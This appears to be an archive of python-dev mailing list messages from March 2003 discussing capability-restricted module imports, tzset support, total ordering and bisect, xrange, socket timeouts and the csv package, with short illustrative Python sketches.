> I don't have a clear idea yet of how that could be implemented in a 
> Pythonic, compatible way.

Maybe, instead of there being one ultra-global namespace for importing
modules from, it should be part of a function's environment. By
default a function invocation would inherit the "import environment"
of its caller, but the caller could override this to provide a more
restricted environment.

This would be equivalent to passing in a set of allowable
modules as an implicit parameter to every call.
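
One way to picture this, as a sketch only: a context variable can play the
part of the implicit parameter.  Everything here (`_import_env`,
`restricted_to`, `load`, `play`, and the default set of names) is
hypothetical, and an explicit `load()` call stands in for the import
statement, which this sketch does not intercept.

```python
import contextlib
import contextvars
import importlib

# Hypothetical "import environment": module names the current call chain may load.
_import_env = contextvars.ContextVar(
    "import_env", default=frozenset({"math", "string", "os"})
)


@contextlib.contextmanager
def restricted_to(names):
    """Narrow the environment for the enclosed calls; it is never widened."""
    token = _import_env.set(_import_env.get() & frozenset(names))
    try:
        yield
    finally:
        _import_env.reset(token)


def load(name):
    """Stand-in for the import statement: check the inherited environment first."""
    if name not in _import_env.get():
        raise ImportError("module %r is not in the import environment" % name)
    return importlib.import_module(name)


def play():
    # The callee inherits whatever environment its caller established.
    return load("math").sqrt(9)


print(play())
with restricted_to({"string"}):
    try:
        play()
    except ImportError as exc:
        print("blocked:", exc)
```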

Greg Ewing, Computer Science Dept, +--------------------------------------+
University of Canterbury,	   | A citizen of NewZealandCorp, a	  |
Christchurch, New Zealand	   | wholly-owned subsidiary of USA Inc.  |
greg@cosc.canterbury.ac.nz	   +--------------------------------------+


From greg@cosc.canterbury.ac.nz  Tue Mar 18 23:48:43 2003
From: greg@cosc.canterbury.ac.nz (Greg Ewing)
Date: Wed, 19 Mar 2003 11:48:43 +1200 (NZST)
Subject: [Python-Dev] Capabilities
In-Reply-To: <20030318162507.GB13338@panix.com>
Message-ID: <200303182348.h2INmhK09178@oma.cosc.canterbury.ac.nz>

Aahz <aahz@pythoncraft.com>:

> <blink>  Are you saying that an int is a capability?

Some integers could confer quite powerful capabilities.  42, for
example, apparently gives us the capability of knowing the answer to
the ultimate question of life, the universe and everything, which has
to be a pretty awesome thing to know!

All we need now is a capability which gives us access to the
question...

Greg Ewing, Computer Science Dept, +--------------------------------------+
University of Canterbury,	   | A citizen of NewZealandCorp, a	  |
Christchurch, New Zealand	   | wholly-owned subsidiary of USA Inc.  |
greg@cosc.canterbury.ac.nz	   +--------------------------------------+


From tdelaney@avaya.com  Wed Mar 19 00:05:03 2003
From: tdelaney@avaya.com (Delaney, Timothy C (Timothy))
Date: Wed, 19 Mar 2003 11:05:03 +1100
Subject: [Python-Dev] python-dev Summary for 2003-03-01 through 2003-03-15
Message-ID: <338366A6D2E2CA4C9DAEAE652E12A1DE2E7D33@au3010avexu1.global.avaya.com>

> From: Christian Tismer [mailto:tismer@tismer.com]
> > 
> > This is all going into the current summary.  Wasn't expecting this to
> > generate new content, though.  =)
> 
> Hee hee, be aware of infinite recursion :-)

I wouldn't expect it to be that much of a problem. Each time through
seems to take a lot of time, so there are plenty of opportunities to
break out of the infinite recursion before the net fills up ...

Tim Delaney


From guido@python.org  Wed Mar 19 01:22:28 2003
From: guido@python.org (Guido van Rossum)
Date: Tue, 18 Mar 2003 20:22:28 -0500
Subject: [Python-Dev] csv package ready for prime-time?
In-Reply-To: "Your message of Tue, 18 Mar 2003 17:09:46 CST."
 <15991.42810.167975.876841@montanaro.dyndns.org>
References: <15991.42810.167975.876841@montanaro.dyndns.org>
Message-ID: <200303190122.h2J1MSI22680@pcp02138704pcs.reston01.va.comcast.net>

> Is there a formal process for "dusting off" software which has been
> playing in the sandbox?  What about getting PEP 305 stamped with the
> BDFL seal of approval?  (I realize Guido's busy in the run-up to
> PyCon.)

I have no bandwidth for looking at this until after I'm back from the
UK Python conference (April 7), but I think there's no reason why you
should wait for me with moving the csv package to the dist/src tree.

--Guido van Rossum (home page: http://www.python.org/~guido/)


From neal@metaslash.com  Wed Mar 19 01:31:48 2003
From: neal@metaslash.com (Neal Norwitz)
Date: Tue, 18 Mar 2003 20:31:48 -0500
Subject: [Python-Dev] string.strip doc vs code mismatch
Message-ID: <20030319013148.GX14067@epoch.metaslash.com>

Could someone please review the patch attached to this bug:

        http://python.org/sf/697220

There are two patches attached--one for 2.3 and one for 2.2.3.
As you may recall, there was a parameter added to all the strip
methods for 2.3.  This was inadvertently backported to 2.2.2,
but only for string and unicode methods.

Sometime back it was decided to update the string module for 2.2.2 to
stay in sync with the string/unicode methods.  However, there have
been various partial fixes.  I believe the patches correct all
the problems:

        * fix differences between extra param name--it was referred to 
          as both chars and sep in code/doc, always use chars
        * update docstrings, add notes about chars param (sep -> chars)
        * add chars param to each string.*strip() function
          (i.e., lstrip, rstrip)
        * update doc with functionality and to correct when the param
          was added
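
For reference, a brief illustration of the chars parameter using the str
methods of current Python.  The string.strip() family of module functions no
longer exists in Python 3, so this shows only the method form, and the sample
text is made up.

```python
text = "xx--spam--xx"

# chars is treated as a set of characters to remove, not as a prefix or suffix.
print(text.strip("x"))     # --spam--
print(text.strip("x-"))    # spam
print(text.lstrip("x-"))   # spam--xx
print(text.rstrip("x-"))   # xx--spam
```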

Neal


From zen@shangri-la.dropbear.id.au  Thu Mar 20 05:01:33 2003
From: zen@shangri-la.dropbear.id.au (Stuart Bishop)
Date: Thu, 20 Mar 2003 16:01:33 +1100
Subject: [Python-Dev] tzset
In-Reply-To: <LNBBLJKPBEHFEDALKOLCCEFMEBAB.tim.one@comcast.net>
Message-ID: <057832A9-5A91-11D7-8A30-000393B63DDC@shangri-la.dropbear.id.au>

On Monday, March 17, 2003, at 01:17  PM, Tim Peters wrote:

> [Guido]
>> ...
>> I don't know if it makes sense to provide tzset() on Windows; from
>> Tim's description it doesn't sound likely.
>
> I wouldn't object if someone else wanted to do the work (which includes
> documenting it well enough to cut off an endless stream of obvious
> questions).  The Windows tzset is weak but maybe usable for some people.
> For example, time zone names must be exactly 3 characters, and you can't
> tell the Windows tzset when daylight time begins or ends:  it uses US rules
> no matter what the time zone.  The native Win32 SetTimeZoneInformation()
> doesn't suffer these idiocies, but I'm not sure whether calling that affects
> the Unixish _tzname (etc) variables.  "Doing the work" also means figuring
> out all that stuff.

I've submitted an update to SF:
	http://www.python.org/sf/706707

This version should only build time.tzset if it accepts the TZ environment
variable formats documented at:
	http://www.opengroup.org/onlinepubs/007904975/basedefs/xbd_chap08.html
So it shouldn't build under Windows.

The last alternative would be to expose time.tzset if it exists at all,
and the test suite would simply check to make sure it doesn't raise
an exception. This would leave behaviour totally up to the OS, with a
corresponding lack of documentation in the Python library reference.
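
Either way, calling code would have to cope with time.tzset being
absent.  A minimal sketch of such a guard, assuming a POSIX-style TZ
string; the helper name set_local_timezone is hypothetical and is not
part of the submitted patch:

```python
import os
import time

def set_local_timezone(tz_spec):
    """Apply tz_spec via TZ and tzset(); return False if tzset is missing."""
    if not hasattr(time, "tzset"):
        return False              # platform did not build time.tzset
    os.environ["TZ"] = tz_spec    # POSIX TZ format, e.g. "UTC0"
    time.tzset()                  # re-read TZ into the C library state
    return True

changed = set_local_timezone("UTC0")
if changed:
    utc_offset_seconds = time.timezone   # seconds west of UTC for the new zone
```

On a platform without tzset the helper simply reports failure and leaves
the environment untouched.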

-- 
Stuart Bishop <zen@shangri-la.dropbear.id.au>
http://shangri-la.dropbear.id.au/


From tim_one@email.msn.com  Thu Mar 20 05:09:53 2003
From: tim_one@email.msn.com (Tim Peters)
Date: Thu, 20 Mar 2003 00:09:53 -0500
Subject: [Python-Dev] Re: Re: lists v. tuples
In-Reply-To: <200303172334.h2HNY2j13488@europa.research.att.com>
Message-ID: <LNBBLJKPBEHFEDALKOLCGEPDEBAB.tim_one@email.msn.com>

[Andrew Koenig]
> I'm beginning to wonder if part of what's going on is that there are
> really two different concepts that go under the general label of
> "comparison", namely the cases where trichotomy does and does not apply.
>
> In the first case, we have a total ordering; in the second, we have what
> C++ calls a "strict weak ordering", which is really an ordering of
> equivalence classes.

I'm afraid Python people really want a total ordering, because that's what
Python gave them at the start (ya, I understand the long vs float business,
but nobody in real life ever griped about that).  It's a curious thing that
the *specific* total ordering Python supplied changed across releases, and
nobody complained about that(*).  Also curious that, within a release,
nobody complained that the specific total ordering can change across program
runs (comparisons falling back to comparing object addresses are consistent
within a run, but not necessarily across runs).

That doesn't deny there are multiple comparison concepts people want, it
just speaks against a strict weak ordering being one of them.  For example,
when using binary search on a sorted list to determine membership, people
want total ordering.  OTOH, when faced with 42 < "42" in isolation, sane
Python people want an exception.  When faced with "x in
sequence_or_mapping", most people want __eq__ but some people want object
identity (e.g., it's not always helpful that 3 == 3.0).
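
A small sketch of those competing wishes, written against present-day
Python 3 rather than the 2.x releases under discussion (where mixed-type
ordering did not raise).  The helper contains_identical is hypothetical.

```python
# Membership testing falls back on ==, so an int is "found" among floats.
found_by_equality = 3 in [1.0, 2.0, 3.0]

def contains_identical(seq, obj):
    """Membership by object identity instead of __eq__."""
    return any(item is obj for item in seq)

found_by_identity = contains_identical([1.0, 2.0, 3.0], 3)

# In Python 3, ordering an int against a str raises TypeError.
try:
    42 < "42"
    mixed_ordering_raises = False
except TypeError:
    mixed_ordering_raises = True
```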

One size doesn't fit anyone all the time.


(*) I have to take that back:  people *did* complain when the relative
position of None changed.  It's an undocumented fact that None compares
"less than" non-None objects now (of types that don't force a different
outcome), but that wasn't always so, and I clearly recall a few complaints
after that changed, from people who apparently deliberately relied on its
equally undocumented comparison behavior before.


From tim_one@email.msn.com  Thu Mar 20 05:58:55 2003
From: tim_one@email.msn.com (Tim Peters)
Date: Thu, 20 Mar 2003 00:58:55 -0500
Subject: [Python-Dev] Re: Re: lists v. tuples
In-Reply-To: <yu99znnuxbsi.fsf@europa.research.att.com>
Message-ID: <LNBBLJKPBEHFEDALKOLCIEPGEBAB.tim_one@email.msn.com>

[ark@research.att.com]
> The binary-search routines in the C++ standard library mostly avoid
> having to do != comparisons by defining their interfaces in the
> following clever way:
>
>         binary_search   returns a boolean that indicates whether the
>                         value sought is in the sequence.  It does not
>                         say where that value is.
>
>         lower_bound     returns the first position ahead of which
>                         the given value could be inserted without
>                         disrupting the ordering of the sequence.
>
>         upper_bound     returns the last position ahead of which
>                         the given value could be inserted without
>                         disrupting the ordering of the sequence.

These last two are quite like Python's bisect.bisect_{left, right}, which
are implemented using only __lt__ element comparison.

>         equal_range     returns (lower_bound, upper_bound) as a pair.
>
> In Python terms:
>
>         binary_search([3, 5, 7], 6)  would yield False
>         binary_search([3, 5, 7], 7)  would yield True
>         lower_bound([1, 3, 5, 7, 9, 11], 9)    would yield 4
>         lower_bound([1, 3, 5, 7, 9, 11], 8)    would also yield 4
>         upper_bound([1, 3, 5, 7, 9, 11], 9)    would yield 5

>>> import bisect
>>> x = [1, 3, 5, 7, 9, 11]
>>> bisect.bisect_left(x, 9)
4
>>> bisect.bisect_left(x, 8)
4
>>> bisect.bisect_right(x, 9)
5
>>>

We conclude that C++ did something right <wink>.

>         equal_range([1, 1, 3, 3, 3, 5, 5, 5, 7], 3)
>                                 would yield (2, 5).
>
> If you like, equal_range(seq, x) returns (l, h) such that all the
> elements of seq[l:h] are equal to x.  If l == h, the subsequence is
> the empty sequence between the two adjacent elements with values that
> bracket x.
>
> These definitions turn out to be useful in practice, and are also
> easy to implement efficiently using only < comparisons.

I think Python got the most valuable of these, and they're useful in Python
too.  Nevertheless, if you're coding an explicit conventional binary search
tree (nodes containing a value, a reference to "a left" node, and a
reference to "a right" node), cmp() is more convenient; and even more so if
you're coding a ternary search tree.
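
For completeness, the two C++ routines that bisect lacks can be sketched
on top of it.  The names equal_range and binary_search below are
hypothetical Python helpers borrowed from the C++ names; they are not
part of the bisect module.

```python
import bisect

def equal_range(seq, x):
    """Return (lo, hi) such that every element of seq[lo:hi] equals x."""
    return bisect.bisect_left(seq, x), bisect.bisect_right(seq, x)

def binary_search(seq, x):
    """Report whether x occurs in sorted seq, using only < on elements."""
    i = bisect.bisect_left(seq, x)
    # seq[i] >= x is already known; x is present iff x is not < seq[i].
    return i < len(seq) and not (x < seq[i])

pair = equal_range([1, 1, 3, 3, 3, 5, 5, 5, 7], 3)
missing = binary_search([3, 5, 7], 6)
present = binary_search([3, 5, 7], 7)
```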

Sometimes cmp allows for more compact code.  Python's previous samplesort
implementation endured a *little* clumsiness to infer equality (a == b) from
not (a<b or a>b).  The current adaptive mergesort feels the restriction to <
more acutely and in more places.  For example, when merging two runs A and
B, part of the adaptive strategy is to precompute, via a form of binary
search, where A[0] belongs in B, and where B[-1] belongs in A.  This sounds
like two instances of the same task, but they're maddeningly different
because-- in order to preserve stability --the first search needs to be of
the bisect_left flavor and the second of bisect_right.  Combining both modes
of operation in a single search routine with a flag argument, and sticking
purely to __lt__, leads to horridly obscure code, so these searches are
actually implemented by distinct functions.  If it were able to use cmp()
instead, folding them into one routine would have been unobjectionable (if <
is needed, check for cmp < 0; if <= is needed, check for cmp <= 0 same-as
cmp < 1; so 0 or 1 could be passed in to select between < and <= very
efficiently and reasonably clearly).
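
To make the last point concrete, here is a sketch of the folded routine
in Python.  It is not the listobject.c code; cmp is defined locally
(Python 3 has no builtin cmp), and bisect_cmp and its bias argument are
hypothetical names.

```python
import bisect

def cmp(a, b):
    """Three-way comparison: negative, zero, or positive."""
    return (a > b) - (a < b)

def bisect_cmp(seq, x, bias):
    """bias=0 behaves like bisect_left, bias=1 like bisect_right."""
    lo, hi = 0, len(seq)
    while lo < hi:
        mid = (lo + hi) // 2
        # cmp < 0 means seq[mid] < x; cmp < 1 means seq[mid] <= x.
        if cmp(seq[mid], x) < bias:
            lo = mid + 1
        else:
            hi = mid
    return lo

x = [1, 3, 5, 7, 9, 11]
left_of_9 = bisect_cmp(x, 9, 0)
right_of_9 = bisect_cmp(x, 9, 1)
```

The single integer argument selects between the two flavours without
any extra branching inside the loop.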


From ben@algroup.co.uk  Thu Mar 20 10:33:26 2003
From: ben@algroup.co.uk (Ben Laurie)
Date: Thu, 20 Mar 2003 10:33:26 +0000
Subject: [Python-Dev] capability-mediated modules (was: python-dev Summary
 for 2003-03-01 through 2003-03-15)
In-Reply-To: <200303182317.h2INHtF09051@oma.cosc.canterbury.ac.nz>
References: <200303182317.h2INHtF09051@oma.cosc.canterbury.ac.nz>
Message-ID: <3E7998F6.6010201@algroup.co.uk>

Greg Ewing wrote:
> Zooko <zooko@zooko.com>:
> 
> 
>>Now what I would *like* is that instead of doing "import os" to load code, 
>>instead the caller provides, or doesn't provide the os module as part of the 
>>construction/invocation of A.
>>
>>I don't have a clear idea yet of how that could be implemented in a 
>>Pythonic, compatible way.
> 
> 
> Maybe, instead of there being one ultra-global namespace for importing
> modules from, it should be part of a function's environment. By
> default a function invocation would inherit the "import environment"
> of its caller, but the caller could override this to provide a more
> restricted environment.

Inheriting things is not the capability way. Passing capabilities that 
allow imports is, of course, but isn't very Pythonic. I'm not sure 
there's a neat way to fix this that keeps both camps happy.

> This would be equivalent to passing in a set of allowable
> modules as an implicit parameter to every call.

Making it explicit would make me happy. Can you pass parameters to an 
import?

Cheers,

Ben.

-- 
http://www.apache-ssl.org/ben.html       http://www.thebunker.net/

"There is no limit to what a man can do or how far he can go if he
doesn't mind who gets the credit." - Robert Woodruff


From pedronis@bluewin.ch  Thu Mar 20 12:41:07 2003
From: pedronis@bluewin.ch (Samuele Pedroni)
Date: Thu, 20 Mar 2003 13:41:07 +0100
Subject: [Python-Dev] capability-mediated modules (was: python-dev Summary for 2003-03-01 through 2003-03-15)
References: <200303182317.h2INHtF09051@oma.cosc.canterbury.ac.nz> <3E7998F6.6010201@algroup.co.uk>
Message-ID: <003601c2eedd$fab452e0$6d94fea9@newmexico>

>
> Making it explicit would make me happy. Can you pass parameters to an
> import?
>

not directly,

an extension like

import module(parmmod=....,...)

would not seem totally unreasonable.

The problem is that normally modules are uniquely globally identified
singletons, but the very notion of parametrization implies instantiation and
that breaks the singleton part. When to instantiate a new module and when not?

a potential problem is not simply module-specific global state, but that
e.g. the classes exported from two instances of the same module would be
_distinct_ and so not interoperable.
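
The effect can be reproduced today without any new syntax.  In this
sketch the helper instantiate_module is hypothetical; it stands in for a
parametrized import by executing the same source into two fresh module
objects.

```python
import types

SOURCE = "class Token:\n    pass\n"

def instantiate_module(name, source):
    """Build a fresh module object by executing source in its namespace."""
    module = types.ModuleType(name)
    exec(source, module.__dict__)
    return module

first = instantiate_module("spam", SOURCE)
second = instantiate_module("spam", SOURCE)

token = first.Token()
same_class = first.Token is second.Token          # two distinct class objects
interoperable = isinstance(token, second.Token)   # instance of the "other" Token?
```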

regards.


From ben@algroup.co.uk  Thu Mar 20 15:33:38 2003
From: ben@algroup.co.uk (Ben Laurie)
Date: Thu, 20 Mar 2003 15:33:38 +0000
Subject: [Python-Dev] capability-mediated modules (was: python-dev Summary
 for 2003-03-01 through 2003-03-15)
In-Reply-To: <003601c2eedd$fab452e0$6d94fea9@newmexico>
References: <200303182317.h2INHtF09051@oma.cosc.canterbury.ac.nz> <3E7998F6.6010201@algroup.co.uk> <003601c2eedd$fab452e0$6d94fea9@newmexico>
Message-ID: <3E79DF52.3020305@algroup.co.uk>

Samuele Pedroni wrote:
>>Making it explicit would make me happy. Can you pass parameters to an
>>import?
>>
> 
> 
> not directly,
> 
> an extension like
> 
> import module(parmmod=....,...)
> 
> would not seem totally unreasonable.
> 
> The problem is that normally modules are uniquely globally identified
> singletons, but the very notion of parametrization implies instantiation and
> that breaks the singleton part. When to instantiate a new module and when not?
> 
> a potential problem is not simply module specific global state but that the
> e.g. classes exported from two instances of the same module would be _distinct_
> and so not interoperable.

I don't think we'd want to change them from being singletons, just 
restrict access to them based on capabilities. So, I was more thinking 
of something like:

import(capability) module

where the capability conveys the authority to import the module. Oh. I 
see the problem: if module A imports module B, and then module A is 
imported in turn by C and D, with C having a capability to B that it 
hands to A, but D _not_ doing so, then where are we? I suppose we would 
say that the import of A into D failed in that case. Of course, this 
still leaves open the question of how we pass the authority to import 
into the module, so I guess it would look like:

import(cap1) module(cap2,cap3,...)

and cap2 etc. would have to only be used in the import statements in the 
module. And this is getting messy.

OTOH, my original idea was that the only modules a capability-enabled 
module would be allowed to import would be ones that are either 
capability-safe, or modules in the same "package" (for some definition 
of package). Any other module would have to be imported by whoever 
initialised the capability environment, and appropriate capabilities 
handed in to the capability-enabled objects. This sounds cleaner to me, 
if somewhat nebulous at the moment.

Cheers,

Ben.

-- 
http://www.apache-ssl.org/ben.html       http://www.thebunker.net/

"There is no limit to what a man can do or how far he can go if he
doesn't mind who gets the credit." - Robert Woodruff


From zooko@zooko.com  Thu Mar 20 21:34:00 2003
From: zooko@zooko.com (Zooko)
Date: Thu, 20 Mar 2003 16:34:00 -0500
Subject: [Python-Dev] capability-mediated modules (was: python-dev Summary for 2003-03-01 through 2003-03-15)
In-Reply-To: Message from Greg Ewing <greg@cosc.canterbury.ac.nz>
 of "Wed, 19 Mar 2003 11:17:55 +1200." <200303182317.h2INHtF09051@oma.cosc.canterbury.ac.nz>
References: <200303182317.h2INHtF09051@oma.cosc.canterbury.ac.nz>
Message-ID: <E18w7fk-0000du-00@localhost>

 Greg Ewing <greg@cosc.canterbury.ac.nz> wrote:
>
> Maybe, instead of there being one ultra-global namespace for importing
> modules from, it should be part of a function's environment. By
> default a function invocation would inherit the "import environment"
> of its caller, but the caller could override this to provide a more
> restricted environment.

This is a reasonable idea too.

It bears an intriguing similarity to scoping in general.  One can put 
capabilities into local variables, and then functions and classes that you 
define inside that scope automatically have access to them.  That doesn't work 
for separate modules, of course, which have no enclosing lexical scope.

So your proposal seems sort of like a kind of dynamic scoping for modules, but 
instead of the imported module having access to all variables in the scope of 
the "import" statement (the *lexical* scope of the import statement), it has 
access to specific ones -- either a special "variables accessible to imported 
modules" dict or specially flagged ones, or something.

For what it's worth, the solution to this problem in E is quite elegant.  When 
code is loaded from a module, it is executed with optional arguments.  So if 
your spam module requires a TCP socket, you can write (transliterating to Python 
syntax):

# Python with E's parameterized import
import socket
import spam(socket.socket(socket.AF_INET, socket.SOCK_STREAM))

If spam needs access to the eggs module, you could write:

import eggs
import spam(eggs)


But as Samuele Pedroni has pointed out [1] there are deeper problems here, 
namely that modules are currently singletons, which doesn't fit with the notion 
of parameterization.  It also doesn't fit with security!

Consider a module that is safe to use if you give it your credit card number, 
and safe to use if you give it a network socket, but unsafe if you give it both!

Capabilities offer this kind of security -- you can arrange it so that nobody 
else can give privileges to an object, thus allowing you to give the object 
privileges which would otherwise be dangerous.

This is easy with objects in cap-Python, but not with modules:

ttt1 = TicTacToe()
ttt1.verify_card_number(mycreditcard)

ttt2 = TicTacToe()
ttt2.connect_to_server(socket.socket(socket.AF_INET, socket.SOCK_STREAM))


So one design for cap-Python might say that only safe modules can be imported by 
cap-Python code.  Every unsafe privilege would have to be granted by using 
references (passed as arguments, assigned to variables, etc.).  No authority 
would ever be made available to capability-secured code through "import".

This might not be much of a loss, since all of the unsafe stuff that you can 
currently import -- socket, os, etc. -- is rather too coarse-grained anyway and 
will almost certainly be wrapped in a finer-grained interface before being given 
to capability-confined code.
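
A rough sketch of that style in ordinary Python, with no claim that it
is enforceable in today's interpreter (the _write attribute is still
reachable).  The AppendOnlyLog class is hypothetical and only shows
authority arriving as a reference instead of through "import".

```python
class AppendOnlyLog:
    """Holds exactly one authority: the write callable it was handed."""

    def __init__(self, write):
        self._write = write

    def log(self, message):
        self._write(message + "\n")

# The caller decides what the object may touch.  Here it is a plain
# list; it could equally be a narrow wrapper around a file or socket.
lines = []
logger = AppendOnlyLog(lines.append)
logger.log("started")
logger.log("finished")
```

The class body imports nothing, so everything it can affect is visible
at the point where it is constructed.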


Regards,

Zooko

http://zooko.com/
         ^-- under re-construction: some new stuff, some broken links

[1] http://mail.python.org/pipermail/python-dev/2003-March/034172.html


From dave@boost-consulting.com  Thu Mar 20 21:43:51 2003
From: dave@boost-consulting.com (David Abrahams)
Date: Thu, 20 Mar 2003 16:43:51 -0500
Subject: [Python-Dev] Re: More int/long integration issues
References: <7F171EB5E155544CAC4035F0182093F03CF792@INGDEXCHSANC1.ingdirect.com> <200303131903.h2DJ3Ug06240@odiug.zope.com>
Message-ID: <uwuitaf3c.fsf@boost-consulting.com>

Guido van Rossum <guido@python.org> writes:

> The bytecode compiler should be clever enough to see that you're
> writing
>
>   for i in range(...): ...
>
> and that there's no definition of range other than the built-in one
> (this requires a subtle change of language rules); it can then
> substitute an internal equivalent to xrange().

Ouch!  What happens to:

       def foo(seq):
           for x in seq:
               ...

       foo(xrange(small, really_big))

if xrange dies??

-- 
Dave Abrahams
Boost Consulting
www.boost-consulting.com


From guido@python.org  Thu Mar 20 22:33:35 2003
From: guido@python.org (Guido van Rossum)
Date: Thu, 20 Mar 2003 17:33:35 -0500
Subject: [Python-Dev] Re: More int/long integration issues
In-Reply-To: Your message of "Thu, 20 Mar 2003 16:43:51 EST."
 <uwuitaf3c.fsf@boost-consulting.com>
References: <7F171EB5E155544CAC4035F0182093F03CF792@INGDEXCHSANC1.ingdirect.com> <200303131903.h2DJ3Ug06240@odiug.zope.com>
 <uwuitaf3c.fsf@boost-consulting.com>
Message-ID: <200303202233.h2KMXbG07782@odiug.zope.com>

> Guido van Rossum <guido@python.org> writes:
> 
> > The bytecode compiler should be clever enough to see that you're
> > writing
> >
> >   for i in range(...): ...
> >
> > and that there's no definition of range other than the built-in one
> > (this requires a subtle change of language rules); it can then
> > substitute an internal equivalent to xrange().
> 
> Ouch!  What happens to:
> 
>        def foo(seq):
>            for x in seq:
>                ...
> 
>        foo(xrange(small, really_big))
> 
> if xrange dies??

Good point.  I guess xrange() can't die until range() becomes an
iterator (which can't be before Python 3.0).

Hm, maybe range() shouldn't be an iterator but an iterator
generator.  No time to explain; see the discussion about restartable
iterators.
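
The distinction can be illustrated with the range object of present-day
Python 3, which came much later than this message and is shown here only
as one example of an "iterator generator": it is not its own iterator,
so it can be traversed repeatedly.

```python
numbers = range(3)

# A range hands out a fresh iterator each time; it is not one itself.
is_own_iterator = iter(numbers) is numbers
first_pass = list(numbers)
second_pass = list(numbers)

# A plain iterator, by contrast, is exhausted after one traversal.
one_shot = iter(numbers)
drained_once = list(one_shot)
drained_twice = list(one_shot)

# No list is materialised, so a very large range stays cheap.
big = range(10**12)
last_item = big[-1]
```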

--Guido van Rossum (home page: http://www.python.org/~guido/)


From skip@pobox.com  Thu Mar 20 22:46:36 2003
From: skip@pobox.com (Skip Montanaro)
Date: Thu, 20 Mar 2003 16:46:36 -0600
Subject: [Python-Dev] socket timeouts fail w/ makefile()
Message-ID: <15994.17612.495528.162817@montanaro.dyndns.org>

I discovered much to my chagrin today that the socket module's new timeout
capability doesn't play well with file objects as returned by a socket's
makefile method.  Tim O'Malley's timeoutsocket module avoids this problem by
implementing a simple file-like object directly on top of the socket without
calling makefile().  Is there some reason this approach wasn't adopted when
adding timeouts to the socket module?  I would think the greatest use of
timeouts would be using higher-level line-oriented modules like urllib and
ftplib.  In addition, since makefile() isn't always available, it seems
worthwhile to implement something in socket.py, thus making makefile()
universally available.

I filed a bug report about this issue earlier today in case people are
interested:

    http://www.python.org/sf/707074

Skip


From greg@cosc.canterbury.ac.nz  Thu Mar 20 23:16:13 2003
From: greg@cosc.canterbury.ac.nz (Greg Ewing)
Date: Fri, 21 Mar 2003 11:16:13 +1200 (NZST)
Subject: [Python-Dev] capability-mediated modules (was: python-dev Summary for 2003-03-01 through 2003-03-15)
In-Reply-To: <003601c2eedd$fab452e0$6d94fea9@newmexico>
Message-ID: <200303202316.h2KNGDM07222@oma.cosc.canterbury.ac.nz>

Samuele Pedroni <pedronis@bluewin.ch>:

> The problem is that normally modules are uniquely globally identified
> singletons, but the very notion of parametrization implies instantiation and
> that breaks the singleton part.

Python already has things you can instantiate -- they're
called classes!

Seems to me if you want instantiation, you should be using
a class, not a module.

Greg Ewing, Computer Science Dept, +--------------------------------------+
University of Canterbury,	   | A citizen of NewZealandCorp, a	  |
Christchurch, New Zealand	   | wholly-owned subsidiary of USA Inc.  |
greg@cosc.canterbury.ac.nz	   +--------------------------------------+


From skip@pobox.com  Thu Mar 20 23:38:54 2003
From: skip@pobox.com (Skip Montanaro)
Date: Thu, 20 Mar 2003 17:38:54 -0600
Subject: [Python-Dev] csv package stitched into CVS hierarchy
Message-ID: <15994.20750.356162.465058@montanaro.dyndns.org>

The csv package is now in the main branch of the CVS hierarchy.  I will
leave the structure in the sandbox for a few days before "cvs remove"ing it
in case I missed something.

Skip


From greg@cosc.canterbury.ac.nz  Thu Mar 20 23:51:06 2003
From: greg@cosc.canterbury.ac.nz (Greg Ewing)
Date: Fri, 21 Mar 2003 11:51:06 +1200 (NZST)
Subject: [Python-Dev] capability-mediated modules (was: python-dev Summary for 2003-03-01 through 2003-03-15)
In-Reply-To: <E18w7fk-0000du-00@localhost>
Message-ID: <200303202351.h2KNp6707299@oma.cosc.canterbury.ac.nz>

Zooko <zooko@zooko.com>:

> So your proposal seems sort of like a kind of dynamic scoping for
> modules

Yes, it would be dynamic scoping of the import namespace.

The reason I think it needs to be dynamic rather than lexical is that
it isn't really objects or functions that we want to allow or deny
capabilities to, it's *users* (for some suitably general notion of
"user"). It may be okay for a particular method to do something when
it's called by one user, but not another.

The current method of controlling access to modules by overriding
__import__ suffers from the problem that a given module can only have
one __import__ hook at a time.  There's no way for different users of
the same module to have different importing abilities.
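
A per-caller import policy can be approximated today by giving each
piece of executed code its own builtins.  This is a sketch only and is
not a security boundary; make_restricted_import and run_with_imports are
hypothetical helpers.

```python
import builtins

def make_restricted_import(allowed):
    """Return an __import__ replacement that permits only names in allowed."""
    real_import = builtins.__import__

    def restricted_import(name, globals=None, locals=None, fromlist=(), level=0):
        if name.split(".")[0] not in allowed:
            raise ImportError("import of %r is not permitted" % name)
        return real_import(name, globals, locals, fromlist, level)

    return restricted_import

def run_with_imports(source, allowed):
    """Execute source with an import hook private to this invocation."""
    env_builtins = dict(vars(builtins))
    env_builtins["__import__"] = make_restricted_import(allowed)
    namespace = {"__builtins__": env_builtins}
    exec(source, namespace)
    return namespace

ok = run_with_imports("import math\nresult = math.sqrt(16)", {"math"})

try:
    run_with_imports("import os", {"math"})
    blocked = False
except ImportError:
    blocked = True
```

Two callers can run the same source with different allowed sets, but
the policy is fixed where the code is executed; it does not follow the
call chain in the dynamically scoped way proposed above.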

From what's been said about E, it seems that the solution there is to
have instantiable modules (which means they're more like classes than
modules, in Python terms) and to explicitly pass a lot of capabilities
around.

It seems to me that you'd end up with a lot of extra parameters to
pass around in calls that way, and most of the time you'd just be
passing on what had been passed to you -- hence my suggestion of
dynamic scoping.

But, not having studied any real E code, it may be that it doesn't
turn out to be that bad in practice. Probably I shouldn't say any more
until I know what I'm talking about...

Greg Ewing, Computer Science Dept, +--------------------------------------+
University of Canterbury,	   | A citizen of NewZealandCorp, a	  |
Christchurch, New Zealand	   | wholly-owned subsidiary of USA Inc.  |
greg@cosc.canterbury.ac.nz	   +--------------------------------------+


From pedronis@bluewin.ch  Thu Mar 20 23:54:21 2003
From: pedronis@bluewin.ch (Samuele Pedroni)
Date: Fri, 21 Mar 2003 00:54:21 +0100
Subject: [Python-Dev] capability-mediated modules (was: python-dev Summary for 2003-03-01 through 2003-03-15)
References: <200303202316.h2KNGDM07222@oma.cosc.canterbury.ac.nz>
Message-ID: <024c01c2ef3c$076aa120$6d94fea9@newmexico>

> Samuele Pedroni <pedronis@bluewin.ch>:
>
> > The problem is that normally modules are uniquely globally identified
> > singletons, but the very notion of parametrization implies instantiation and
> > that breaks the singleton part.

to make things clearer

> Python already has things you can instantiate -- they're
> called classes!

Python already has things you can parametrize -- they're
called classes!

> Seems to me if you want instantiation, you should be using
> a class, not a module.

Seems to me if you want parametrization, you should be using
a class, not a module.

Maybe.

[ what is sometimes called a "unit", meaning a parametrizable and instantiable
module, can be a useful generic-programming construct. ]

